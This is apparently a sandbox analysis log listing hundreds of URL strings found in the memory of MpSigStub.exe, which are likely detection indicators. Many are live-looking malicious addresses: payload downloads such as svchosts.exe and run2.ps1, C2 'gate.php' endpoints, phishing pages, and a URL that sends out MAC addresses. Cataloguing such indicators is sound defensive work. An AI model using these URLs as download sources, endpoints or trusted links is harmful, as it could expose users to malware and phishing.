Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://barely-art.com/wp-content/themes/pennews/languages/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://barrefaeli-hot.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://batrasiaku.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://batysnewskz.kz/ups.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://bbc.lumpens.org/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bbfitblogger.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bbtbfr.pw/GetHPHost
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bbtbfr.pw/ads/gad1.js
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bdsmforyoungs.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://beautifulmaori.co.nz/wp-content/plugins/wp-xmll_2/gorfy2pq/1ny0mnkih27id8m.ktk
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://beautybrief.com/c/gate.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://berita-mediasemasa.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://berita-tanahmelayu.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://berkah2013.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://best-search.us
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://best4hack.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://bestbsd.info/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bestnyaduit.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://bestofthebesttatoo.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bestoneoffour.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://bestsoll.com/forum/go.php?sid=2
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://besttechforum.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://besttoolbars.net/af_analytics
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bestwebtips.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://beutiful-girl-fuck-moviepp.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://bfb3c.21a8b.j4fbs.k876c575n.v48796e.f5.nbdc.y7.v2da8e4kt.drovemeetings.in/
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://bgtc.pctonics.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://bhngvfcdswqwertyuiopasdfghjkllkjhgfdsapo.ydns.eu/srvhost.doc
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://biancavoguel.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://bibliaamada.org/counter.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://big-boobs-nude.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://bigboobsp.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://bigdeal777.com/gate.php?f=
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bikerboyz11.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bilakubercakap.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://bilincaltitelkincd.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://bilincaltitemizligi.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://billpay-center.com/post/506pblpks.exe
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://binnenspegel.fryslan.intern/ofdielingen/iv/ict/projecten/docbaseq32014/documenten/forms/templ
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://binni-ks.com/modules/dashgoals/binni.htm)
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://bintai.com.sg.oliverboeckel.com/zgf2ev9zdwlaymludgfplmnvbs5zzw==
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://binyousafindustries.com/fonts/jo/mops.exe
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://bis.180solutions.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bisersables.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2er
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2fy
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2h9
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2pe
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq2tt
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fq3ed
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqksy
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fql9f
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqlxg
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqm5f
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqmag
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqmin
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqnfa
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqnzq
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqrh4
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqv6g
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqv8b
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqwam
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqwdq
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxt8
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxx3
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqxx8
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyco
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqycs
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyh6
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyha
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyhe
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqyhk
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzi9
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzim
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzmn
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzmv
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzr4
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqzt3
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://bit.do/fqztv
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/28jsjnq)
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2bl50do
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2cobwhj)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2cokxeu)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2df4jbx)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2h3fi0m)
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2hload25ydu19
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2jg4gfn)
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2kud4md)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2p8qtra)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bit.ly/2q93tca)
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://bitcoincoin.xyz/payment/xls.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://bitmessage.org/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://bittupadam.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bjphplegal.org/wp-admin/script/)/s/uri
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://bl103w.blu103.mail.live.com/mail/InboxLight.aspx?n=
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://blackhole.ddnsgeek.com:8088
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://blackl1vesmatter.org/gate
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://blackl1vesmatter.org/success
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://blacksun.phpnet.us/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blackterias.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://blank-record.com/cgi-bin/search?id=
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://blessedindia.org/9ifuurhgwq
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://blockchain.info/address/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog-ilmu10.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blog-misteri.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://blog-rye.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://blog.eduadda.in/wp-content/themes/twentythirteen/get.php?id=
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://blog.x-row.net/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogcliphai.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bloggersiput.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bloggiaitribg.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://bloghumortododiablog.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://blogketoanthue.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://bloglistcorner.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogluyoruz.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://blogphimhay41.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://blogsemasacaparnab.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://bloodcrypt.com/info/info.txt
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://bloodybits.com/edwinjefferson.com/ie_xo/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://bnpost.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bollyinthon.com/docusign/doc/home/index.php)
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://bonkersmen.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://bonzo.lublin.pl/help/helpNEW.exe
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://book4u-free.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://booknology.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bootreading.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://bopdu.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://bornforthis.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://bornonthescene.com/purchase/kill.php?ten=fingers)
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bosengaptek.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://boss.orda.icu/mailb.php
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://bot.cjfeeds.com
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bousalemfoot.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://brazzerslove.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://brembotembo.com/1.dat
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://brembotembo.com/2.dat
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://brembotembo.com/doc.xls
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://brilhosefascinios.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://brokentools.xyz/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://brotherunited.cf/.start/yxblcmv6qgnhcm5pdmfslmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://browsetosave.info
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://browseusers.myspace.com/Browse/Browse.aspx
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://bsalsa.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://bsskillthdyemmulatorsdevelovercomun6bfs.duckdns.org/document/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://bugs.clamav.net
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://bukankeranaakutakcintafull.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://bulldogsportscol.com/docs/adobe/viewer.php?idp=login
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://busco-mujeres.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://businesswebapp.com/realtors/wp-admin/js/jb/login%20pdf.html)
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://butterchoco.net/admin/bull/gate.php
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://buy.haote.com/?
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://by137w.bay137.mail.live.com/mail/HipLight.aspx?n=
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://by137w.bay137.mail.live.com/mail/InboxLight.aspx?
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://by142w.bay142.mail.live.com/mail/InboxLight.aspx?n=
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://bytecoin.tk/m/svchosts.exe
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://c2quocoaidateh.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://c4.faceb00k.com:8888/files/run2.ps1
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca.mtin.es/mtin/ocsp0
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://caferestaurantnador.com/wp-includes/0onjp/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://calastargate.net/y82rtzbz.php?id=1484429
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://calendar.cjishu.com/index.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://californianlondon.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: http://calleveinte.com.mx/ups-quantum-view
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://calux123.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://camaraquiterianopolis.ce.gov.br/rechnung/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://canadahalalec.com/b685cf9fdc885f90abbb39b13022d1c4.php?q=
Source: MpSigStub.exe, 00000026.00000003.18295167449.00000138BE1EC000.00000004.00000001.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/(%w%w
Source: MpSigStub.exe, 00000026.00000003.18315823751.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://canonicalizer.ucsuri.tcs/3
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://capsnit.com
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://captinads.com/oldtest/page.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://care-indonesia.org/open-invoices/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://cargohl.com/ds/161120.gif
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://carrentalhelp.org/cd/cd.php?id=%s&ver=ig1
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://carsgirlssexy.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://casaalberti.com/wp-content/files_mf/2/resume.php?id=
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://cashbackmoa.co.kr/reward.php?name=%s&userid=%s&macaddr=%s&orgaddr=%s
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://casinotropez.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://catatanerwin.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://catatanfarhans.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://catell.ru/set.js
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://cbadenoche.com
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://cbl.toolbar4free.com/cgi-bin/s.exe
